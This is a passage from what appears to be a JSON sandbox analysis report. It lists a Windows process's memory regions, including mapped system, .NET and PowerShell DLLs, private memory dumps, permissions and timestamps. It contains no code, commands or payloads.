"ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_921", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:00:20.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791740186624, "type": "region", "version": 1 }, "end_va": 8791740280831, "entry_point": 8791740199608, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_922", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791740186624, "timestamp": "00:00:21.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791737040896, "type": "region", "version": 1 }, "end_va": 8791737331711, "entry_point": 8791737045092, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_923", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791737040896, "timestamp": "00:00:21.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791337467904, "type": "region", "version": 1 }, "end_va": 8791338094591, "entry_point": 8791337477744, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_924", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791337467904, "timestamp": "00:00:21.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791732649984, "type": "region", "version": 1 }, "end_va": 8791732699135, "entry_point": 8791732654180, "filename": "\\Windows\\System32\\version.dll", "id": "region_925", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791732649984, "timestamp": "00:00:21.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4460543, "entry_point": 0, "filename": null, "id": "region_926", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:21.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000927-addr_0x00000000023d0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 38076415, "entry_point": 0, "filename": null, "id": "region_927", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:21.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1957691392, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1957691392, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_928", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1957691392, "timestamp": "00:00:21.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791306272768, "type": "region", "version": 1 }, "end_va": 8791316353023, "entry_point": 8791306272768, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_929", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791306272768, "timestamp": "00:00:21.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29503487, "entry_point": 0, "filename": null, "id": "region_930", "name": "pagefile_0x0000000001c20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29491200, "timestamp": "00:00:21.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29560831, "entry_point": 0, "filename": null, "id": "region_931", "name": "pagefile_0x0000000001c30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29556736, "timestamp": "00:00:21.605", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000932-addr_0x0000000001f40000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_932", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:00:21.606", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000933-addr_0x0000000001f80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_933", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:00:21.606", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000934-addr_0x00000000028d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 42795008, "type": "region", "version": 1 }, "end_va": 43843583, "entry_point": 0, "filename": null, "id": "region_934", "name": "private_0x00000000028d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42795008, "timestamp": "00:00:21.606", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000935-addr_0x00000000029d0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44896255, "entry_point": 0, "filename": null, "id": "region_935", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:00:21.607", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000936-addr_0x0000000002b10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45154304, "type": "region", "version": 1 }, "end_va": 45678591, "entry_point": 0, "filename": null, "id": "region_936", "name": "private_0x0000000002b10000", "norm_filename": null, "region_type": "private_memory", "start_va": 45154304, "timestamp": "00:00:21.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 448331775, "entry_point": 0, "filename": null, "id": "region_937", "name": "private_0x0000000002b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 45678592, "timestamp": "00:00:21.614", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000938-addr_0x000000001ab90000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 448331776, "type": "region", "version": 1 }, "end_va": 455475199, "entry_point": 0, "filename": null, "id": "region_938", "name": "private_0x000000001ab90000", "norm_filename": null, "region_type": "private_memory", "start_va": 448331776, "timestamp": "00:00:21.615", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000939-addr_0x000000001b260000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 455475200, "type": "region", "version": 1 }, "end_va": 455999487, "entry_point": 0, "filename": null, "id": "region_939", "name": "private_0x000000001b260000", "norm_filename": null, "region_type": "private_memory", "start_va": 455475200, "timestamp": "00:00:21.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791290675200, "type": "region", "version": 1 }, "end_va": 8791306256383, "entry_point": 8791290675200, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_940", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791290675200, "timestamp": "00:00:21.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000941-addr_0x000007ff00020000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_941", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:00:21.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000942-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_942", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:00:21.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000943-addr_0x000007ff00040000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_943", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:00:21.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000944-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:00:21.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000945-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:00:21.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000946-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_946", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:00:21.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000947-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:00:21.624", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000948-addr_0x0000000001c40000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29687807, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:00:22.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 455999488, "type": "region", "version": 1 }, "end_va": 459022335, "entry_point": 455999488, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_949", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 455999488, "timestamp": "00:00:22.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791279206400, "type": "region", "version": 1 }, "end_va": 8791279935487, "entry_point": 8791279206400, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_950", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791279206400, "timestamp": "00:00:22.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791279992832, "type": "region", "version": 1 }, "end_va": 8791290621951, "entry_point": 8791279992832, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_951", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791279992832, "timestamp": "00:00:22.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000952-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091973632, "type": "region", "version": 1 }, "end_va": 8796092039167, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x000007fffff00000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091973632, "timestamp": "00:00:22.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000953-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092628991, "entry_point": 0, "filename": null, "id": "region_953", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:00:22.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791267278848, "type": "region", "version": 1 }, "end_va": 8791279194111, "entry_point": 8791267278848, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_977", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791267278848, "timestamp": "00:00:22.826", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000978-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_978", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:00:22.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 32911359, "entry_point": 32899072, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_979", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:00:22.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 459079680, "type": "region", "version": 1 }, "end_va": 459866111, "entry_point": 459079680, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_980", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 459079680, "timestamp": "00:00:22.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 1999007743, "entry_point": 1998983276, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_981", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1998979072, "timestamp": "00:00:22.928", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000982-addr_0x0000000001f70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 32968703, "entry_point": 0, "filename": null, "id": "region_982", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:00:22.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33116159, "entry_point": 33095680, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_983", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 33095680, "timestamp": "00:00:23.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 459866112, "type": "region", "version": 1 }, "end_va": 460132351, "entry_point": 459866112, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_984", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 459866112, "timestamp": "00:00:23.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000985-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:00:23.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33193983, "entry_point": 33161216, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_986", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 33161216, "timestamp": "00:00:23.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 33226752, "type": "region", "version": 1 }, "end_va": 33230847, "entry_point": 0, "filename": null, "id": "region_987", "name": "pagefile_0x0000000001fb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33226752, "timestamp": "00:00:23.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000988-addr_0x000000001b6e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 460193792, "type": "region", "version": 1 }, "end_va": 461242367, "entry_point": 0, "filename": null, "id": "region_988", "name": "private_0x000000001b6e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 460193792, "timestamp": "00:00:23.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505610240, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_989", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:00:23.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791262953472, "type": "region", "version": 1 }, "end_va": 8791263891455, "entry_point": 8791262953472, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_990", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791262953472, "timestamp": "00:00:23.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791263936512, "type": "region", "version": 1 }, "end_va": 8791267270655, "entry_point": 8791263936512, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_991", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263936512, "timestamp": "00:00:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791316627456, "type": "region", "version": 1 }, "end_va": 8791317323775, "entry_point": 8791316627456, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_992", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791316627456, "timestamp": "00:00:23.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791338123264, "type": "region", "version": 1 }, "end_va": 8791338553343, "entry_point": 8791338123264, "filename": 